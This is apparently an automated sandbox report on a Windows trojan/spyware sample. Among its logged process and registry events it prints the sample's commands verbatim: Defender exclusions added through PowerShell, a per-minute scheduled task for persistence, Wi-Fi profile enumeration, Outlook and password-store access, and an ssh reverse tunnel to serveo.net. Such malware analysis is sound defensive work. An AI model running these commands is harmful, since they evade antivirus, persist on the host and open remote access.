                  Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
                  Source: vkefq4cv.oil.exe.0.dr, iYbhDf.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: vkefq4cv.oil.exe.0.dr, iYbhDf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, iYbhDf.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.jqOHOuPMJP.exe.3e4a9f8.0.raw.unpack, iYbhDf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: vkefq4cv.oil.exe.4.dr, iYbhDf.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: vkefq4cv.oil.exe.4.dr, iYbhDf.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: jqOHOuPMJP.exe, BootstrapLoader.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: jqOHOuPMJP.exe, BootstrapLoader.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@66/19@3/6
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jqOHOuPMJP.exe.logJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMutant created: \Sessions\1\BaseNamedObjects\jo0x2dte3z
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8072
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4176:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeFile created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeJump to behavior
                  Source: jqOHOuPMJP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: jqOHOuPMJP.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD747C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: jqOHOuPMJP.exeReversingLabs: Detection: 13%
                  Source: jqOHOuPMJP.exeVirustotal: Detection: 24%
                  Source: unknownProcess created: C:\Users\user\Desktop\jqOHOuPMJP.exe C:\Users\user\Desktop\jqOHOuPMJP.exe
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: unknownProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632
                  Source: unknownProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 3
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: jqOHOuPMJP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: jqOHOuPMJP.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: jqOHOuPMJP.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdbD966DD2-7850-423A-B1D8-7882CE1A6D15.log source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\system32\rsaenh.dll.pdb| source: vkefq4cv.oil.exe, 00000012.00000002.2077754048.0000010DF0DFF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2a source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*TOP-A source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: cmd.exe, 00000005.00000003.1850351981.0000022BB8350000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2S source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\vkefq4cv.oil.exe source: cmd.exe, 00000005.00000002.1851434800.0000022BB8158000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Core.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: mscorlib.pdb! source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Configuration.pdbx source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Windows.Forms.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD37000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831EneJ source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: winload_prod.pdbWINLOA~1.PDBWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*0 source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Management.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Drawing.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2E source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\Boss\Desktop\Laps\Laps\obj\Release\Laps.pdb source: jqOHOuPMJP.exe
                  Source: Binary string: System.Management.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.Core.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831o source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831n source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbR source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD0C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: System.ni.pdb source: WERCB81.tmp.dmp.41.dr
                  Source: Binary string: ntkrnlmp.pdbl source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
                  Source: jqOHOuPMJP.exeStatic PE information: 0x8F4114C5 [Wed Feb 28 05:04:05 2046 UTC]
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_067EE438 pushad ; iretd
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_067E648F push es; ret
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_067E6592 push esp; ret
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeCode function: 0_2_067E7162 push eax; retf
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F5632D push eax; ret
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04F53A9B push ebx; retf
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeFile created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeFile created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
